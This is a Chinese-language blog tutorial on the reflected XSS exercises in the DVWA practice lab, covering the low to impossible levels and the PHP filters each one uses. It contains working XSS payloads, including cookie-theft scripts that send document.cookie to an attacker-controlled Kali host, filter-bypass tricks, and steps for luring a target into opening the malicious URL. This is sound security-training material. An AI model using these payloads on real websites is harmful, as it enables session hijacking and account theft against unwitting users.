DVWA------反射型XSS

一,XSS中常用的JS代码和HTML元素

(1)普通使用

<script>alert('弹窗内容')</script>          #直接嵌入


#元素事件
<body onload=alert('弹窗内容')>    
<a href=http://192.168.44.130>超链接描述</a
<img src=http://192.168.44.130/XXX.jpg onerror=alert('弹窗内容')>       #没有XXX.jpg -->执行alert()
<a href='' onclick=alert('弹窗内容')>描述</a>                           #onclick -->点击执

  • 在这里插入图片描述
    在这里插入图片描述

(2) 获得cookie和重定向

#重定向
<script>window.location="URL"</script>
<iframe src='http://192.168.44.130/a.jpg' height='0' width='0'></iframe>
  • 在这里插入图片描述

#获取cookie
<script>alert(document.cookie)</script>
<script>new Image().src="http://192.168.44.130/c.php?output="+documnet.cookie;</script>
  • 在这里插入图片描述

(3)引入脚本文件

<script src='http://192.168.44.130/XXX.js' > </script>

二,DVWA的学习

(1)低级

【源码】

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?> 

没有任何过滤


1.1 重定向
<script>window.location="http://www.baidu.com"</script>

得到URL

http://192.168.44.130/dvwa-new/vulnerabilities/xss_r/?name=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F192.168.44.130%2Fc.php%3Foutput%3D%22%2Bdocumnet.cookie%3B%3C%2Fscript%3E#

可以将URL发送给目标

1.2 获取cookie
 <a href='' onclick=alert(document.cookie)>HA!</a>
  • 在这里插入图片描述

1.3 kali监听获取目标的cookie
  • 1.向服务器发送JS脚本(cookie)
  • 2.浏览器向黑客回复一个有JS脚本的页面(URL)【当前页面】
  • 3.黑客将这个URL发给目标
  • 4.目标收到页面 --> 执行脚本 --> 将cookie发送给黑客

192.168.130.146----->kali
192.168.44.133------>服务器
准备工作:在kali的web网页根目录建立获取cookie的脚本并开启服务

  • 在这里插入图片描述
  • 在这里插入图片描述

.
①攻击方向服务器发送JS代码

 <script src='http://192.168.44.146/get.js'></script>

.
②服务器回复,攻击方获得含有JS的URL

  http://192.168.44.130/dvwa-new/vulnerabilities/xss_r/?name=%3Cscript+src%3D%27http%3A%2F%2F192.168.44.146%2Fget.js%27%3E%3C%2Fscript%3E

.
③攻击方将URL发送给目标,等待其打开
.
④目标打开URL,向访问服务器,然后执行JS,向kali访问并发送cookie(目标对服务器的)

  • 在这里插入图片描述
    在这里插入图片描述

⑤kali监听得到cookie

  • 在这里插入图片描述

.
⑥kali关掉nc,避免目标浏览器一直请求

在这里插入图片描述
在这里插入图片描述
146是kali的IP


(2)中级

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );      
	              【【【???过滤<script>  ---><script>过滤为 ''// Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?> 
2.1 绕过方法
2.1.1 大写 script
<scRipt>alert('a')</scRIpt>
  • 在这里插入图片描述
2.1.2 复写
<scr<script>ipt>alert('aa')</scr<script>ipt> 

在这里插入图片描述

2.1.3 使用其他没有被过滤的标签

(3)高级

【源码】

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
                        
    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?> 

代码使用preg_replace() 函数用于正则表达式的搜索和替换,将script前后相关的内容都替换为空,使得双写绕过、大小写混淆绕过不再有效;(正则表达式中i表示不区分大小写)

在High级别中,虽然无法使用 <script>标签注入XSS代码,但是可以通过<img><body>等标签事件或者等标签的src属性注入恶意的js代码。

  • 在这里插入图片描述
  • 在这里插入图片描述

使用其他标签绕过

  • 在这里插入图片描述

(4)impossible

【源码】

 <?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] )
             【【【??html实体化】】】

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

使用htmlspecialchars()函数把预定义的字符&、”、 ’、<、>转换为 HTML 实体,防止浏览器将其作为HTML元素;不能实现反射型XSS攻击带<>的攻击;
在这里插入图片描述

4.1 绕过方法

在可以input的地方输入恶意代码
在这里插入图片描述

三,php常用的过滤函数总结

(1) str_replace()函数

替换字符串

$name = str_replace( '<script>', '', $_GET[ 'name' ] );

(2) preg_replace()函数

用于正则表达式的搜索和替换,将指定匹配的内容的前后相关的所有内容都替换为空

$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); 

(3)htmlspecialchars()函数

html实体化

$name = htmlspecialchars( $_GET[ 'name' ] ); 
发布了49 篇原创文章 · 获赞 33 · 访问量 1万+

猜你喜欢

转载自blog.csdn.net/Z_Grant/article/details/100062157